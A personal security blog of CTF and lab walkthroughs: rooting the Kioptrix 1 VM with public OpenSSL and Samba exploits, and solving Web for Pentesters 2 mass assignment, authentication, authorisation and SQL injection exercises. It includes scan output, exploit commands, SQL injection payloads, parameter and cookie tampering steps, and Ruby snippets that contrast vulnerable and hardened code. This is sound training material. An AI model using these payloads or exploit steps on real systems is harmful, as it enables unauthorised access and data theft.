Vulnhub challenge – Kioptrix 1

Back again, and this time with a new goal in mind. Recently a friend of mine got his OSCP, which has inspired me to go for mine in the near future. Until then, I'm going to work through CTFs that are closer to what I can expect in the OSCP. A little googling turned up this blog by abatchy. The first one I'll be tackling is the Kioptrix 1 VM. It's an easy VM to tackle, with multiple ways of getting root access. As always, let's start with some recon.


# Nmap 7.40 scan initiated Wed Aug 30 03:40:59 2017 as: nmap -sSVC -A -p- -oN nmap-scan 192.168.1.24
Nmap scan report for 192.168.1.24
Host is up (0.00022s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-08-30T21:41:25+00:00; +13h59m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:7F:18:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Running nmap against the machine reveals multiple open ports; the ones we are interested in are 22, 80, 139 and 443.

The SSH version seems pretty solid with no real vulnerabilities, so I moved on to port 80, an Apache site. Browsing to it revealed nothing of use, just the default Apache page.

Since it's a web server, I ran nikto to see if it could find anything.


- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.24
+ Target Hostname: 192.168.1.24
+ Target Port: 80
+ Start Time: 2017-09-06 02:20:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8345 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2017-09-06 02:20:25 (GMT-4) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

OpenSSL and mod_ssl are out of date. Running searchsploit on openssl gave me some exploits, but one in particular caught my eye: OpenFuck. Obviously it caught my eye because of the name, but looking into it, the exploit would give me root access. Heartbleed wouldn't work for this version of OpenSSL, as it needs version 1.0.1 through 1.0.1f. Copying that file into your working directory and compiling it won't work out of the box. After a bit of research it turns out you need to install some packages and edit the file, as described here. The only thing you need to change is that instead of installing libssl-dev, you install libssl1.0-dev, and it should work.

Now compile with gcc -o openssl-explt 764.c -lcrypto. Running the executable ./openssl-explt with no arguments prints the expected parameters: the target hex value from the table it lists (0x6b for us), the target IP and a port number.

Now we run ./openssl-explt 0x6b 192.168.1.24 443, let it do its thing, and boom, we have root access.

However, the description mentioned multiple ways of getting root. So I went back through my nmap logs and saw a Samba share open. Running an enum4linux scan against the machine gave me a list of users but, more importantly, the version number.


Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Aug 30 04:07:55 2017

==========================
| Target Information |
==========================
Target ........... 192.168.1.24
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

====================================================
| Enumerating Workgroup/Domain on 192.168.1.24 |
====================================================
[+] Got domain/workgroup name: MYGROUP

============================================
| Nbtstat Information for 192.168.1.24 |
============================================
Looking up status of 192.168.1.24
KIOPTRIX <00> - B Workstation Service
KIOPTRIX <03> - B Messenger Service
KIOPTRIX <20> - B File Server Service
..__MSBROWSE__. <01> - B Master Browser
MYGROUP <00> - B Domain/Workgroup Name
MYGROUP <1d> - B Master Browser
MYGROUP <1e> - B Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 192.168.1.24 |
=====================================
[+] Server 192.168.1.24 allows sessions using username '', password ''

===========================================
| Getting domain SID for 192.168.1.24 |
===========================================
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

======================================
| OS information on 192.168.1.24 |
======================================
[+] Got OS info for 192.168.1.24 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.1.24 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03

=============================
| Users on 192.168.1.24 |
=============================

=========================================
| Share Enumeration on 192.168.1.24 |
=========================================
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)

Server Comment
--------- -------
KIOPTRIX Samba Server

Workgroup Master
--------- -------
MYGROUP KIOPTRIX
WORKGROUP READYSHARE

Again using searchsploit, I found another exploit that would give me remote code execution. I copied that into the working directory and compiled it with gcc 10.c -o smb-explt. Running ./smb-explt spits out the parameters needed: the platform (linux in our case) and the IP address. ./smb-explt -b linux -c 192.168.1.24, and boom, root again.

This VM was nice and simple, a good way to get back into CTFs after a bit of a break. I'm going to start the second one ASAP, which is going to be more of a challenge.

web for pentesters 2 mass assignment

For this post I'll be going through the mass assignment examples in Web for Pentesters 2. Mass assignment takes advantage of how some programming frameworks let programmers bind HTTP request parameters directly to model attributes. An attacker abuses this by sending extra request parameters in the hope of overwriting attributes the application never meant to expose. OWASP has a great write-up on how it works in different languages and how to protect against it.

This walkthrough will show you how to exploit this flaw using a web proxy. These examples take advantage of the mass assignment flaw found in Ruby.

Example 1:

So first load up the example page, then the proxy of your choice, and make sure it is set up to intercept the traffic.

Then sign up as a regular user.

Once the request has been sent, go to your proxy app.

In the GET request, add the parameter &user[admin]=1 after the existing parameters.

Example 2:

Same as above, I think I may have done the first example a little wrong :S

Example 3:

This example follows the same steps as before, except that instead of user[admin]=1 to get admin, you add user[company_id]=2 to gain access to company 2's secret data.
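To show what the application is doing with those extra parameters, here is an added example (my own plain-Ruby stand-in, not PentesterLab's code): a model that binds every user[...] key it receives, beside one that only accepts the fields the signup form is meant to set. The User class, its default values and the query string are all constructed for the example.

```ruby
# Added example (not PentesterLab's code): a plain-Ruby stand-in for a
# framework model showing how user[admin]=1 and user[company_id]=2 get bound,
# and the attribute whitelist that stops it. No Rails needed.
require 'cgi'

class User
  attr_accessor :name, :password, :admin, :company_id
  PERMITTED = %w[name password].freeze   # what the signup form may set

  def initialize
    @admin = false    # privileged fields start with safe defaults
    @company_id = 1   # constructed: the company a new signup belongs to
  end

  # Vulnerable: every user[...] key is written straight onto the model.
  def assign_all(attrs)
    attrs.each { |k, v| public_send("#{k}=", v) if respond_to?("#{k}=") }
    self
  end

  # Hardened: drop anything the form is not allowed to set before binding.
  def assign_permitted(attrs)
    assign_all(attrs.select { |k, _| PERMITTED.include?(k) })
  end
end

# Turn "user[name]=bob&user[admin]=1" into {"name"=>"bob", "admin"=>"1"}.
# Only the single-level user[key] shape used in the exercise is handled.
def user_params(query)
  CGI.parse(query).each_with_object({}) do |(key, vals), out|
    out[Regexp.last_match(1)] = vals.first if key =~ /\Auser\[(\w+)\]\z/
  end
end

def register(query, hardened:)
  user = User.new
  attrs = user_params(query)
  hardened ? user.assign_permitted(attrs) : user.assign_all(attrs)
end

if __FILE__ == $PROGRAM_NAME
  q = 'user[name]=bob&user[password]=pw&user[admin]=1&user[company_id]=2'
  v = register(q, hardened: false)
  h = register(q, hardened: true)
  puts "vulnerable: admin=#{v.admin.inspect} company_id=#{v.company_id.inspect}"
  puts "hardened:   admin=#{h.admin.inspect} company_id=#{h.company_id.inspect}"
end
```

Real frameworks do the same filtering under names like strong parameters or attr_accessible; the point is that the allow-list lives in the code, not in whatever the client sends.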

That will be it for now; hopefully by next week I'll have either the CAPTCHA examples or the randomness issues examples done.

Web for pentesters 2-Authentication

Today I'll be going through the authentication exercise from Web for Pentesters 2. This exercise wasn't too difficult; the hard part was example 2, which I'll get into later on, but otherwise it's pretty straightforward. So let's get into it.

Example 1:

For the first example the username, admin, is given to you, but the password you have to guess. You could run a password cracker, or, as it's a weak password, you could easily guess it. The password is admin.

Example 2:

This example was a pain to do and I still haven't cracked it with my script (which is available on my Bitbucket account here). However, the username and password are in the Ruby file for this example: username hacker, password p4ssw0rd (with a zero, not an o).

Example 3:

In the third example you are going to need a proxy like Burp Suite or OWASP ZAP. Once you have one installed and set up, follow the steps below to crack the exercise.

  1. Load the page. (Make sure there are no parameters in the URL, as this interferes with the process.)
  2. Load up the proxy.
  3. Find the user variable in the cookie.
  4. Set the user variable to admin.
  5. Submit the request.

Boom! You are now admin.

Example 4:

Here you have to run a password cracker. Any online cracker should work; I have yet to run one on this exercise and will update this post once I do.

Example 5:

In this example there is a flaw in the registration process. We can create a user with admin privileges with the following steps:

  1. Click on the register link.
  2. Create a user with the username Admin and any password you want.

This will get you admin rights; the problem lies in how the MySQL database compares usernames.

Example 6:

In the last example we are again exploiting the logic in the register page to get admin privileges.

  1. Go to the register page.
  2. Create a user with the username admin followed by a space, and any password.

Boom! You are now an admin XD. The problem again lies in the comparison of the new username against the usernames in the database, as admin and admin (with a space) are two different users on the system.
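Examples 5 and 6 share one root cause, so here is an added example (my own plain-Ruby simulation, not PentesterLab's code) of the mismatch. The assumed mechanism: registration checks uniqueness with an exact string comparison, while the login lookup is a MySQL WHERE username = ... under the default collation, which ignores case and trailing spaces; both comparisons are simulated in Ruby, and the users table is constructed.

```ruby
# Added example (not PentesterLab's code): why registering "Admin" or "admin "
# ends up with admin rights. Assumed mechanism: registration checks uniqueness
# with Ruby's exact string comparison, while the login lookup runs in MySQL,
# whose default case-insensitive, PAD SPACE collation sees all three names as
# the same string. Both comparisons are simulated in plain Ruby.

# Constructed users table: username => admin flag, admin row first.
SEED_USERS = { 'admin' => true }.freeze

# What a MySQL _ci collation does with two strings: case folded, trailing
# spaces ignored. This is the comparison WHERE username = ? performs.
def mysql_ci_equal?(a, b)
  a.downcase.rstrip == b.downcase.rstrip
end

# The login path: first row whose name matches under MySQL's rules.
def admin_after_login?(login_name, users)
  match = users.find { |row_name, _| mysql_ci_equal?(row_name, login_name) }
  match ? match[1] : false
end

# Vulnerable registration: exact comparison, so 'Admin' and 'admin ' look new.
def register_vulnerable(name, users = SEED_USERS)
  return :taken if users.key?(name)
  users.merge(name => false)
end

# Hardened registration: canonicalize, then compare the way the database will.
def canonical(name)
  name.strip.downcase
end

def register_hardened(name, users = SEED_USERS)
  return :taken if users.keys.any? { |existing| canonical(existing) == canonical(name) }
  users.merge(canonical(name) => false)
end

if __FILE__ == $PROGRAM_NAME
  ['Admin', 'admin '].each do |name|
    users = register_vulnerable(name)
    puts "#{name.inspect}: registered, admin after login? #{admin_after_login?(name, users)}"
    puts "#{name.inspect}: hardened registration says #{register_hardened(name).inspect}"
  end
end
```

In a real deployment the same canonical form should also be enforced by a unique index on the username column, so the database rejects the duplicate even if application code is bypassed.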

Thanks for reading; if you have any questions or comments, please leave them below.

Web for pentesters 2 Authorisation

This week I'll go over the authorisation bypass examples for Web for Pentesters 2. I know last week I said I would go through the authentication examples, but I wasn't able to finish them in time (example 2 is a pain). Without further ado, let's go through the exercise.

Example 1:

In this example, we try to bypass authorisation by just altering the number at the end of the URL, like so:

authorization/example1/infos/1
and
authorization/example1/infos/2

This gives you direct access to the resources, even when you aren't logged in.

Example 2:

In this example, you can access other users' files simply by incrementing the number at the end of the URL.

authorization/example2/infos/3
and
authorization/example2/infos/4
These will work, but nothing after that; you'll get an internal server error.

Example 3:

This example is similar to the attack above, but we need to exploit it through the edit page.

First you'll need to log in and click on any of the posts. Then change the number at the end of the URL to 3. You now have access to user2's information.

That will do it for now; in the next post I'll hopefully have mass assignment done. Until then, keep on hacking.

Web for Pentesters 2-SQL Injection

Aaaanndd I'm back. Sorry for the lack of posts over the last couple of weeks, but it's the end of the semester, which means assignments are due and exams are coming up. However, now I should be able to get back to a regular posting schedule.
So let's start with the SQL injection exercises from Web for Pentesters 2. This VM carries on from Web for Pentesters 1 and introduces some new and more difficult attacks.

SQLi 1:

First enter a single quote (') in the username field. This produces an error
and reveals the SQL query sent to the database:
SELECT * FROM users WHERE username=''' AND password=''

Now we need to break out of the quoted string:
SELECT * FROM users WHERE username=''or 1=1 -- '' AND password=''
This escapes the rest of the query and prints out success.

'or 1=1 # also works.

SQLi 2:

Here we follow the same steps as SQLi 1, but we also need to include a LIMIT clause, like so:
' or 1=1 limit 1 -- '
We use 1 because the developer has limited the number of users displayed to one.

SQLi 3:

Here is where things get a little more difficult.
Since single quotes in user input are being escaped, we need to insert a backslash (\) to escape.
Once we have escaped the query we can inject our own SQL, like so:
in the username field:

in the password field:
'or 1=1 # '
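To make the backslash trick visible, here is an added example (my own code, not PentesterLab's) that builds the login query with a quote-only sanitizer and with proper escaping, then runs a small tokenizer over each to show which parts the SQL parser sees as string literals. Assumptions: the sanitizer is the common gsub of ' to \' with backslashes left alone, the query shape is the one from the exercise's error message, and the sample inputs are constructed.

```ruby
# Added example (not PentesterLab's code): the SQLi 3 bypass seen through a
# small tokenizer that shows which parts of the query the SQL parser treats
# as string literals. Assumed: the app escapes ' as \' but never escapes \,
# and the query shape is the one from the exercise's error message.

# The weak sanitizer (assumed form): quotes get a backslash, backslashes do not.
def escape_quotes_only(s)
  s.gsub("'") { "\\'" }
end

# Proper escaping: backslashes first, then quotes, so \ can never eat a quote.
def escape_properly(s)
  s.gsub('\\') { '\\\\' }.gsub("'") { "\\'" }
end

def login_query(user, pass, escaper)
  "SELECT * FROM users WHERE username='#{escaper.call(user)}' " \
    "AND password='#{escaper.call(pass)}'"
end

# Reduce a query to what the parser sees: each quoted literal becomes ?, a
# # comment drops the rest. Inside a literal, backslash escapes the next char.
def sql_skeleton(q)
  out = +''
  i = 0
  while i < q.length
    if q[i] == "'"
      i += 1
      while i < q.length && q[i] != "'"
        i += 1 if q[i] == '\\'  # skip the escaped character
        i += 1
      end
      out << '?'
    elsif q[i] == '#'
      break
    else
      out << q[i]
    end
    i += 1
  end
  out.strip
end

# Constructed inputs: a lone backslash as username, the boolean clause as password.
USER_INPUT = '\\'
PASS_INPUT = ' or 1=1 #'

def skeleton_weak      # => "SELECT * FROM users WHERE username=? or 1=1"
  sql_skeleton(login_query(USER_INPUT, PASS_INPUT, method(:escape_quotes_only)))
end

def skeleton_hardened  # => "SELECT * FROM users WHERE username=? AND password=?"
  sql_skeleton(login_query(USER_INPUT, PASS_INPUT, method(:escape_properly)))
end
```

With the weak sanitizer the backslash swallows the quote that should close the username literal, so the password field lands outside any string; parameterized queries avoid the whole class of problem by never splicing input into the SQL text.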

SQLi 4:

For this exercise we are injecting directly into a WHERE clause.

You can produce an error to look at the query by simply removing everything after username=:
SELECT * FROM users WHERE username=;
or by putting in an unknown username like admin:
Mysql2::Error: Unknown column 'admin' in 'where clause': SELECT * FROM users WHERE username=admin;

Basically you can put anything in there to display the users.
req=password
This will display all the users in the system.

SQLi 5:

Here we inject into the URL bar.

To get an error message, try putting in or 1=1.
This produces an error and shows us the SQL query:
SELECT * FROM users LIMIT 3 or 1=1;
Just like the PentesterLab description says, we exploit this through a UNION SELECT, like so:
union select * from users
This displays the entire users table of the database.

The UNION operator combines the output of multiple SELECT statements.

SQLi 6:

Same procedure as above, only this time we're injecting into the GROUP BY clause instead of the LIMIT clause.
To get the entire users table:
union select * from users

SQLi 7:

In this example we follow the steps shown by PentesterLab and inject this as the id parameter:
extractvalue('%3Cxml%3E',concat(%22/%22,(select%20version())))

This produces an error containing the MySQL version.

SQLi 8:

Now we move on to attacks that are triggered later in the application. Here we have to inject our SQL into the username field
and then go to the users page to see the injection work.

First create a bunch of user profiles; you don't need to set a password.
For one of the users, use just a single quote as the username and submit it.
Then go to that user's page, which shows the SQL syntax error.

To see a user's page, click on the id of the user.

Now for the exploitation.
Inject this into the username field:
name'union select * from users where id=1 #
This should return the first user's page.

SQLi 9:

Now for the last sql injection exercise.

Here the problem occurs because the application does not handle Chinese characters correctly.
So all we need is a Chinese character and a statement that always evaluates to true, like so:
脫' or 1=1 #

Tune in next week for authentication walkthrough.